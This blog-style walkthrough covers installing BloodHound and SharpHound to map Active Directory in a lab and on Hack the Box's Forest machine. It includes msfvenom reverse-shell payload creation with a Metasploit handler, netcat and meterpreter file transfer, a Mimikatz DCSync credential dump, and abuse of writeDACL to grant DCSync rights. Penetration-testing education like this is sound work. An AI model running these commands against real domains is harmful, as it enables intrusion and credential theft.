Active Directory BloodHound Walkthrough – A Windows Active Directory forest can get frankly enormous and in the world of AD security, it can hard to tell the trees from the forest (pun). Luckily for both pentesting professionals and for security responders there’s a tool for that. Discovering and graphically representing the trust relationships between users and the objects they interact with in Active Directory is where BloodHound shines. Here’s how to ethical hack Active Directory with BloodHound.
BloodHound is a single page Javascript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a PowerShell/C# ingestor
https://github.com/BloodHoundAD/Bloodhound/wiki
Installing BloodHound can be a nightmare when following most of the available online documentation. That is the reason why this post was made, to make it convenient and repeatable for me. Originally I assumed to install Node.js and npm, but luckily I found an insanely easier way to download Bloodhound. Even the documentation suggests using it over its own method for most operating systems. However, here is the best link I have found for doing the former anyway: link. ( how to install Node.js on Kali Linux) What the guide explains doing is using Node Version Manager to install Node.js and npm. As far as that goes it is the preferred method.
# check that the two service are installed
root@kali: node -v npm -vTable of Contents
Here’s What You Need
Don’t have a 2016 Domain Controller virtual machine yet? See the easy guide for setting up the 2016 Server.
- Windows 7 Virtual Machine
- Kali Linux Virtual Machine
- Windows 2016 Server Virtual Machine
- DNS, AD DS, DHCP Roles Enabled
Networking
Using VirtualBox, the network adapter we are using exclusively is the internal network, intnet. What’s happening is the 2016 server is acting as DHCP server, while the other virtual hosts are acting as DHCP clients. This way they receive ip addresses in this little virtual subnet 10.0.0.1/24.
Installation
The very easiest way to install Bloodhound is outlined in this guide. However, for convenience these are the steps:
# get bloodhound, yep
sudo apt-get install bloodhound
# launch the neo4j db
neo4j console
2019-04-03 21:47:50.086+0000 INFO Remote interface available at http://localhost:7474/
You will now see the web interface for neo4j and will be prompted to change your password. Go ahead and login using the default password, neo4j.
With the neo4j web still open run the command to start the bloodhound service.
# run BloodHound
bloodhound
Get Active Directory Data
Now the next step is to ingest data into the BloodHound web application. For that we need SharpHound. SharpHound is the “C# rewrite of the BloodHound Ingestor”, meaning a new and improved ingestor. In other words it’s a better way to get data from Active Directory for our BH web application. There are some stealth options but I am focusing on collecting everything for this run.
Sharphound is written using C# 7.0 features. To easily compile this project, use Visual Studio 2017.
https://github.com/BloodHoundAD/SharpHound
Building the project will generate an executable as well as a PowerShell script that encapsulates the executable. All dependencies are rolled into the binary.
On the Windows 7 machine (make sure it’s domain-joined) run the program.
# run the C# ingestor this will dump the .zip file we need for the UI
C:\Users\skippy\SharpHound.exe --DomainController 10.0.0.21 -c All
....Compressing data to .\29084334_BloodHound.zip
You can upload this file directly to the UI.Get the Data to BloodHound
There are many options but these are simple.
- using netcat
- using a meterpreter shell
- Remote desktop from Kali Linux
Using netcat we can move files between hosts.
C:\Users\skippy\Desktop>nc.exe -nvlp 6600 > netcat.exe
Using meterpreter this is how to leverage the upload and download functions.
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\Windows\\System32\\nc.exe [*] uploading : /usr/share/windows-binaries/nc.exe -> C:\Windows\System32 [*] Uploaded 58.00 KiB of 58.00 KiB (100.0%): /usr/share/windows-binaries/nc.exe -> C:\Windows\System32\nc.exe [*] uploaded : /usr/share/windows-binaries/nc.exe -> C:\Windows\System32\nc.exe
Here’s the long way to get the file from the Windows machine and move it back to the attacker machine, Kali. This requires some manual interaction, but it is still pretty quick.
root@kali:~ systemctl start postgresql
root@kali:~ msfdb init
root@kali:~ msfconsole
msf > workspace -a scenario_1
msf > workspace scenario_1
msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<kali ip address> -f exe -o /var/www/reverse_shell.exe
msf > cd /var/www
msf > python -m SimpleHTTPServer 8000
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST <kali ip address>
msf5 exploit(multi/handler) > run
meterpreter > download 20190343455_BloodHound.zip /rootThere is a quicker way to run all these commands in a script, a resource script.
# same as doing each command individually
root@kali: msfconsole -r get_a_shell.rcUsing rdesktop on Kali Linux.
root@kali: rdesktop -u skippy -p password <win ip address>
now Queries.
We can see all the details for each user. Not only that this information is also available for each host that is part of the domain-joined network.
Of the queries there is one particularly useful expression, Find Principals with DCSync rights. I cover the DCSync attack using Mimikatz in a previous post. Basically it means that a user has the right to replicate AD information. These should only exist in the default permissions groups, however sometimes they do. These are Enterprise Admins, Domain Admins, etc. Leveraging this information helps determine high-value users as targets in this stage of a pentest.
// check privileges of current user
mimikatz # privilege::debug
// dumps the password in cleartext
mimikatz # lsadump::dcsync /ethicalhackingguru /user:skippy
Change Graph View
By changing layout type, you can see a different view that is a little easier to follow.
HTB Forest Bloodhound Example
I would be remiss to not include a practical example from a great service, Hack the Box. I am using the Invoke-Bloodhound.ps1 script which executes in memory leaving nothing written to disk.
I am loading it in an evil-winrm shell but you could upload the script and use it that way too.
Invoke-Bloodhound -CollectionMethod All -LDAPUser Svc-account -LDAPPass passw0rd
How Do I Move the Zip Back to Kali?
So you have the output of Invoke-Bloodhound.ps1 but how do you move it back to the Kali box? You can try Netcat but what a pain in the ass so really there is a better way.
That way is starting Impacket’s smbserver.py kali . and then mount that share from the Windows target.
And on the Kali side that activity looks like this below.
It also helps to right click on a target and select that a target is owned that way the overall progression is evident.
My owned service account is part of the Exchange Windows Permissions group which has writeDACL permission which means I can add ACLs to domain objects.
What that means then is that I can add domain user to that group and add the DCSync privilege for exploitation.
ACLPwn Tutorial
These two tools go hand in hand. Aclpwn will automatically read the Bloodhound files and locate possible paths for exploitation. You can then use it exploit the path which you choose.
To start aclpwn you have to first start neo4j console then you can use it and I usually have to specify the db credentials.
